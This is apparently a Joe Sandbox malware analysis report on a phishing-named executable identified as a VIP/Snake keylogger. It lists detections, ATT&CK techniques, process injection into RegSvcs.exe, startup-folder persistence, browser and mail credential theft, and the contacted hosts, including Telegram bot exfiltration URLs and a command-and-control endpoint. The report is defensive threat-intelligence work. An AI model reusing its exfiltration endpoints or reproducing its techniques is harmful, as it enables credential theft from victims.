Source: ageless.exe | Binary or memory string: WIN_7
Source: ageless.exe | Binary or memory string: WIN_8
Source: Yara match | File source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.ageless.exe.fe0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.ageless.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ageless.exe PID: 7768, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7804, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ageless.exe PID: 7440, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7432, type: MEMORYSTR

                  Remote Access Functionality

Source: Yara match | File source: 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.ageless.exe.fe0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.ageless.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ageless.exe PID: 7768, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7804, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ageless.exe PID: 7440, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7432, type: MEMORYSTR
Source: Yara match | File source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.ageless.exe.fe0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.ageless.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ageless.exe PID: 7768, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7804, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ageless.exe PID: 7440, type: MEMORYSTR
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F91204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,1_2_00F91204
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F91806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00F91806
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00DE1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,2_2_00DE1204
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00DE1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00DE1806
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 111 Scripting | 2 Valid Accounts | 1 Native API | 111 Scripting | 1 Exploitation for Privilege Escalation | 11 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 2 Valid Accounts | 2 Valid Accounts | 3 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 127 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 1 Non-Standard Port | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 212 Process Injection | 1 Masquerading | LSA Secrets | 321 Security Software Discovery | SSH | 3 Clipboard Data | 3 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 2 Valid Accounts | Cached Domain Credentials | 111 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | 24 Application Layer Protocol | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 111 Virtualization/Sandbox Evasion | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 212 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
Behavior Graph ID: 1590972; Sample: QUOTATION REQUIRED_Enatel s...; Startdate: 14/01/2025; Architecture: WINDOWS; Score: 100
• Start node: DNS/IP reallyfreegeoip.org, api.telegram.org, 3 other IPs or domains; signatures: Suricata IDS alerts for network traffic, Found malware configuration, Malicious sample detected (through community Yara rule), 13 other signatures; started QUOTATION REQUIRED_Enatel s.r.l..exe (3) and wscript.exe (1)
• reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)
• api.telegram.org: Uses the Telegram API (likely for C&C communication)
• QUOTATION REQUIRED_Enatel s.r.l..exe: dropped C:\Users\user\AppData\Local\...\ageless.exe, PE32; signature: Binary is likely a compiled AutoIt script file; started ageless.exe (1)
• wscript.exe: Windows Scripting host queries suspicious COM object (likely to drop second stage); started ageless.exe
• ageless.exe (started by QUOTATION REQUIRED_Enatel s.r.l..exe): dropped C:\Users\user\AppData\Roaming\...\ageless.vbs, data; signatures: Antivirus detection for dropped file, Multi AV Scanner detection for dropped file, Binary is likely a compiled AutoIt script file, 4 other signatures; started RegSvcs.exe (15 2)
• ageless.exe (started by wscript.exe): Writes to foreign memory regions; Maps a DLL or memory area into another process; started RegSvcs.exe (2)
• RegSvcs.exe (from the first ageless.exe): DNS/IP checkip.dyndns.com 132.226.247.73, ports 49754, 49772, 49779, UTMEMUS United States; api.telegram.org 149.154.167.220, ports 443, 49853, 49962, TELEGRAMRU United Kingdom; 2 other IPs or domains
• RegSvcs.exe (from the second ageless.exe): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)



Source | Detection | Scanner | Label
QUOTATION REQUIRED_Enatel s.r.l..exe | 39% | ReversingLabs | Win32.Exploit.VIPKeylogger
QUOTATION REQUIRED_Enatel s.r.l..exe | 35% | Virustotal |
QUOTATION REQUIRED_Enatel s.r.l..exe | 100% | Avira | DR/AutoIt.Gen8
QUOTATION REQUIRED_Enatel s.r.l..exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\supergroup\ageless.exe | 100% | Avira | DR/AutoIt.Gen8
C:\Users\user\AppData\Local\supergroup\ageless.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\supergroup\ageless.exe | 39% | ReversingLabs | Win32.Exploit.VIPKeylogger
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://us2.smtp.mailhostbox.com | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
us2.smtp.mailhostbox.com | 208.91.199.225 | true | false | | high
s-part-0017.t-0009.fb-t-msedge.net | 13.107.253.45 | true | false | | high
reallyfreegeoip.org | 104.21.96.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 132.226.247.73 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2014/01/2025%20/%2023:22:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
http://checkip.dyndns.org/ | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2014/01/2025%20/%2023:11:55%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.office.com/ | RegSvcs.exe, 00000009.00000002.2610745756.0000000002E23000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002E14000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org | RegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | ageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://us2.smtp.mailhostbox.com | RegSvcs.exe, 00000003.00000002.2611160055.000000000298F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.office.com/lB | RegSvcs.exe, 00000003.00000002.2611160055.00000000029DE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002E1E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20a | RegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org | RegSvcs.exe, 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | RegSvcs.exe, 00000003.00000002.2616330427.0000000003813000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmp | false |
                                                            high
                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000009.00000002.2610745756.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002DE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.ecosia.org/newtab/RegSvcs.exe, 00000003.00000002.2616330427.0000000003813000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://varders.kozow.com:8081ageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://aborters.duckdns.org:8081ageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000003.00000002.2616330427.0000000003813000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://51.38.247.67:8081/_send_.php?LRegSvcs.exe, 00000003.00000002.2611160055.000000000296D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://anotherarmy.dns.army:8081ageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000003.00000002.2616330427.0000000003813000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://checkip.dyndns.org/qageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://chrome.google.com/webstore?hl=enlBRegSvcs.exe, 00000003.00000002.2611160055.00000000029AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002DED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://reallyfreegeoip.org/xml/8.46.123.189$RegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.000000000286A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://reallyfreegeoip.orgRegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.000000000283F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000003.00000002.2616330427.0000000003813000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://reallyfreegeoip.org/xml/ageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.000000000283F000.00000004.00000800.00020000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.21.96.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
208.91.199.225 | us2.smtp.mailhostbox.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
                                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                                              Analysis ID:1590972
                                                                                              Start date and time:2025-01-14 16:56:12 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 7m 50s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:13
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:QUOTATION REQUIRED_Enatel s.r.l..exe
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.spyw.expl.evad.winEXE@10/3@4/4
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 80%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 99%
                                                                                              • Number of executed functions: 47
                                                                                              • Number of non-executed functions: 305
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .exe
                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.253.45, 172.202.163.200
                                                                                              • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                              • Execution Graph export aborted for target RegSvcs.exe, PID 7804 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
10:57:18 | API Interceptor | 2857592x Sleep call for process: RegSvcs.exe modified
16:57:14 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs
                                                                                                                  • 13.107.253.45
                                                                                                                  api.telegram.orgConfirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  12.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  ElixirInjector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  QUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  Remittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  TELEGRAMRUConfirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  12.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  12.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  http://bu9.fysou.web.id/webs6/cx.aktifkn.fiturrGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.164.13
                                                                                                                  http://bu9.fysou.web.id/webs6/aktrfn.fitur.pylterGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.164.13
                                                                                                                  Handler.exeGet hashmaliciousDanaBot, VidarBrowse
                                                                                                                  • 149.154.167.99
                                                                                                                  sysadmin.exeGet hashmaliciousVidarBrowse
                                                                                                                  • 149.154.167.99
                                                                                                                  CLOUDFLARENETUSEspPrivStoreAtt116.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.1.5
                                                                                                                  SPOOOFER776.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.0.5
                                                                                                                  PlusPrivStoreAtt116.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.1.5
                                                                                                                  AimPrivStoreAtt117.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 172.67.72.57
                                                                                                                  http://loginmicrosoftonline.al-mutaheda.com/expiration/notice/nRrRc/receiving@accel-inc.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  EspPrivStoreAtt116.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.0.5
                                                                                                                  tpmbypassprivatestore.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.1.5
                                                                                                                  SPOOOFER776.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.1.5
                                                                                                                  email.emlGet hashmaliciousunknownBrowse
                                                                                                                  • 172.64.41.3
                                                                                                                  http://www.brillflooring.comGet hashmaliciousUnknownBrowse
                                                                                                                  • 188.114.96.3
                                                                                                                  UTMEMUSConfirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 132.226.8.169
                                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 132.226.247.73
                                                                                                                  RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 132.226.247.73
                                                                                                                  PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 132.226.8.169
                                                                                                                  tN8GsMV1le.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 132.226.8.169
                                                                                                                  rOrders.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 132.226.247.73
